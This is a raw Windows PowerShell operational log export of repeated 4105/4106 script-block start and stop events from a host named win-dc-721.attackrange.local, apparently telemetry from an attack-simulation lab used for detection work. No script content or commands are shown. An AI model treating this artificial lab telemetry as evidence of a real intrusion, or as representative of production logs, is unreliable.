SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475168
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475167
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475166
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475165
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475164
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475163
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475162
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475161
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475160
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475159
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475158
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475157
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475156
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475155
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475154
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475153
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475152
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475151
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475150
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475149
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475148
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475147
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475146
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475145
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475144
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475143
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475142
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475141
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475140
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475139
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475138
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475137
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475136
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475135
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475134
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475133
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475132
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475131
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475130
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475129
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475128
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475127
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475126
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475125
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475124
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475123
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475122
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475121
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475120
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475119
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475118
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475117
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475116
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475115
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475114
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
